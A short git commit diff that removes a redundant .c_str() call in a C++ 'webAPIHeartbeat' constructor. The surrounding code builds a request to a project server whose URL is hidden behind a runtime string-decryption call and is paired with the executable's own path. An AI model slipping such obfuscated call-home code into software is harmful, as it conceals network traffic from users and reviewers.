should maybe fix a bug?

This commit is contained in:
DarthArgus
2016-10-22 08:30:22 +00:00
parent db9ca59b16
commit f8c87a4573
+1 -1
View File
@@ -7,7 +7,7 @@
using namespace StellaBellum;
webAPIHeartbeat::webAPIHeartbeat() {
std::string filePath = this->get_selfpath().c_str();
std::string filePath = this->get_selfpath();
webAPI api = webAPI::webAPI(
std::string(vxENCRYPT("https://login.stellabellum.net/metric/shoulderTap").decrypt()),